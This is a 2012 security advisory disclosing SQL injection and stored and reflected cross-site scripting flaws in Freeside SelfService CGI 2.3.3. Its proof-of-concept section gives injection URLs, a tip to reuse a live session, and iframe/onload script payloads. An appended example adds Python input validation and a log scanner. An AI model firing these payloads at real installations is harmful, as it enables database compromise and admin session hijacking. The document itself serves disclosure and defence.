Title:
======
Freeside SelfService CGI|API 2.3.3 - Multiple Vulnerabilities


Date:
=====
2012-06-14


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=614


VL-ID:
=====
614


Common Vulnerability Scoring System:
====================================
6.5


Introduction:
=============
Billing, ticketing, reporting and configuration for employees and resellers. The majority of Freeside's
functionality is accessed from here. The back office interface includes searching and viewing of customers,
invoices, trouble tickets and services, as well as reporting, configuration, per-user access control,
reseller virtualization and more.

(Copy of the Vendor Homepage: http://freeside.biz/freeside )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in Freeside's SelfService CGI|API v2.3.3 git.


Report-Timeline:
================
2012-06-14: Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================
Freeside
Product: SelfService CGI|API v2.3.3


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
Multiple SQL injection vulnerabilities are detected in Freeside's SelfService CGI|API v2.3.3.
The vulnerability allows a remote attacker or a local low-privileged user account to inject/execute own
SQL commands on the affected application DBMS without user interaction. The vulnerability is located in
selfservice.cgi and the bound parameters action & svcnum. Successful exploitation of the vulnerability
results in DBMS & application compromise.

Vulnerable Module(s):
[+] View my usage - Service usage details

Vulnerable File(s):
[+] selfservice.cgi

Vulnerable Parameter(s):
[+] svcnum
[+] action


1.2
Multiple persistent input validation vulnerabilities are detected in Freeside's SelfService CGI|API v2.3.3.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
The persistent vulnerabilities are located in cust_main.cgi, part_pkg.cgi, part_event.html and part_device.html
with the bound parameters company, address, package comment, event name & device name. Exploitation requires low user
interaction & a privileged application user account. Successful exploitation of the vulnerability can lead to
session hijacking (admin) or stable (persistent) context manipulation.

Vulnerable File(s):
[+] ../edit/cust_main.cgi?426
[+] ../edit/part_pkg.cgi?4
[+] ../browse/part_event.html
[+] ../browse/part_device.html

Vulnerable Module(s):
[+] [Company] [Address]
[+] [Package] [Comment]
[+] [Event Name]
[+] [Device Name]


1.3
Multiple non-persistent cross site scripting vulnerabilities are detected in Freeside's SelfService CGI|API v2.3.3.
The vulnerability allows remote attackers to hijack customer, moderator or admin website sessions; it requires high
user interaction or a local low-privileged user account. The vulnerabilities are located in the selfservice.cgi file
with the vulnerable bound parameters pkg, pkgnum, beginning & end. Successful exploitation can result in account theft,
phishing & client-side content request manipulation.

Vulnerable Module(s):
[+] Change User Details
[+] Change Package

Vulnerable File(s):
[+] selfservice.cgi

Vulnerable Parameter(s):
[+] pkg & pkgnum
[+] end & beginning
Proof of Concept:
=================
1.1
The SQL injection vulnerability can be exploited by remote attackers without a privileged user account or user interaction.
For demonstration or to reproduce ...

PoC:
../selfserv/selfservice.cgi?session=8cd42b35567e5bdce44bf17779b6431e;action=view_usage_details;svcnum=-1'[SQL-INJECTION];beginning=0;ending=0
../selfserv/selfservice.cgi?session=8cd42b35567e5bdce44bf17779b6431e;action=view_usage_details[SQL-INJECTION];svcnum=X;beginning=0;ending=0

> "SELECT * FROM svc_acct WHERE svcnum = ?": LINE 1: SELECT * FROM svc_acct WHERE svcnum = $1

Note: First get an alive session, exchange it with the expired one of the PoC and then try to access the URL to inject your SQL commands.


1.2
The persistent input validation vulnerabilities can be exploited by remote attackers with low required user interaction.
For demonstration or to reproduce ...

Example:
The attacker creates/edits an account and injects malicious script code, i.e. <iframe src=www.vuln-lab.com onload=alert("VL")></iframe>,
in the vulnerable fields, which are Company and Address. This bug is very dangerous because once the admin enters the admin area
he will see the page of users. The code that we injected will be executed out of the main page context of the admin.


Review: Payname

<font color="#FF0000">Illegal (name) (error code illegal_name) payname:
"><iframe src="selfservice.cgi-Dateien/a.xht" onload='alert("VL")' <<="" font="">
</FONT><BR><BR>


Review: Faxname

<font color="#FF0000">Illegal (phone) (error code illegal_phone) fax:
"><iframe src="selfservice2.cgi-Dateien/a.htm" onload='alert("VL")' <<="" font="">
</FONT><BR><BR>


Review: Username

username) (2-32): "><iframe src="selfservice3.cgi-Dateien/a.htm" onload='alert("VL</FONT'>
</FONT><BR><BR>
<FORM
NAME="OrderPkgForm"


1.3
The non-persistent cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user
interaction & without a local privileged user account. For demonstration or to reproduce ...

PoC:

Module: Change User Details

http://127.0.0.1:8080/selfserv/selfservice.cgi?session=8cd42b35567e5bdce44bf17779b6431e;action=view_usage_details;svcnum=598;beginning=%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C;ending=%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C


Module: Change Package

http://127.0.0.1:8080/selfserv/selfservice.cgi?session=8cd42b35567e5bdce44bf17779b6431e;action=customer_change_pkg;pkgnum=3646;pkg=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

http://127.0.0.1:8080/selfserv/selfservice.cgi?session=8cd42b35567e5bdce44bf17779b6431e;action=customer_change_pkg;pkgnum=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C;pkg=Super%20Bundle%20200GB

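An added example, not from the advisory and not Freeside's own code: the server-side checks that close the selfservice.cgi parameter classes named in 1.1 and 1.3 (integer-only svcnum/pkgnum, an action allow-list, HTML-escaping of the reflected pkg/beginning/ending values), plus a log check that flags requests with the PoC shapes. It assumes svcnum and pkgnum are integer record numbers, takes the two action values from the PoC URLs as the allow-list, and runs on constructed log lines.

```python
import html
import re
from urllib.parse import unquote_plus

# Parameter classes assumed from the advisory's PoC URLs: record numbers that must be
# integers, an action allow-list, and free-text values the page reflects (so escape them).
NUMERIC_PARAMS = {"svcnum", "pkgnum"}
ALLOWED_ACTIONS = {"view_usage_details", "customer_change_pkg"}
REFLECTED_PARAMS = {"pkg", "beginning", "ending"}

def parse_query(query):
    """Split on ';' or '&' (CGI.pm accepts both; the PoC URLs use ';') and percent-decode."""
    pairs = (p.partition("=") for p in re.split(r"[;&]", query) if p)
    return {unquote_plus(k): unquote_plus(v) for k, _, v in pairs}

def validate_params(params):
    """Return (sanitised params, rejection reasons) for one selfservice.cgi request."""
    clean, errors = {}, []
    for key, value in params.items():
        if key in NUMERIC_PARAMS:              # integer-only IDs: no quote can reach the query
            if re.fullmatch(r"[0-9]+", value):
                clean[key] = int(value)
            else:
                errors.append(f"{key}: not an integer")
        elif key == "action" and value not in ALLOWED_ACTIONS:
            errors.append("action: not on allow-list")
        else:                                   # everything reflected into HTML is escaped
            clean[key] = html.escape(value, quote=True)
    return clean, errors

# Constructed log lines: a benign request, a non-numeric svcnum (PoC 1.1 shape), markup in 'beginning' (PoC 1.3 shape).
SAMPLE_LOG = """\
127.0.0.1 - - [14/Jun/2012:10:00:01 +0000] "GET /selfserv/selfservice.cgi?session=abc;action=view_usage_details;svcnum=598;beginning=0;ending=0 HTTP/1.1" 200 512
127.0.0.1 - - [14/Jun/2012:10:00:02 +0000] "GET /selfserv/selfservice.cgi?session=abc;action=view_usage_details;svcnum=-1';beginning=0;ending=0 HTTP/1.1" 500 88
127.0.0.1 - - [14/Jun/2012:10:00:03 +0000] "GET /selfserv/selfservice.cgi?session=abc;action=view_usage_details;svcnum=598;beginning=%22%3E%3Ciframe%20src=a%3E HTTP/1.1" 200 700
"""
LOG_RE = re.compile(r'"GET /selfserv/selfservice\.cgi\?([^ "]*) HTTP/')

def flag_requests(log_text):
    """One finding per logged request that fails validation or carries markup in a reflected parameter."""
    findings = []
    for m in LOG_RE.finditer(log_text):
        params = parse_query(m.group(1))
        _, errors = validate_params(params)
        for key in sorted(params.keys() & REFLECTED_PARAMS):
            if re.search(r"[<>\"']", params[key]):
                errors.append(f"{key}: markup characters")
        if errors:
            findings.append("; ".join(errors))
    return findings
```

Running flag_requests(SAMPLE_LOG) reports the second and third constructed lines and stays silent on the benign one.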
Risk:
=====
1.1
The security risk of the SQL injection vulnerability is estimated as high(-).

1.2
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

1.3
The security risk of the non-persistent cross site scripting vulnerabilities is estimated as low(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [the StOrM] (storm@vulnerability-lab.com)
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply.

Domains: www.vulnerability-lab.com - www.vuln-lab.com
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get permission.

Copyright © 2012 Vulnerability-Lab


--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@vulnerability-lab.com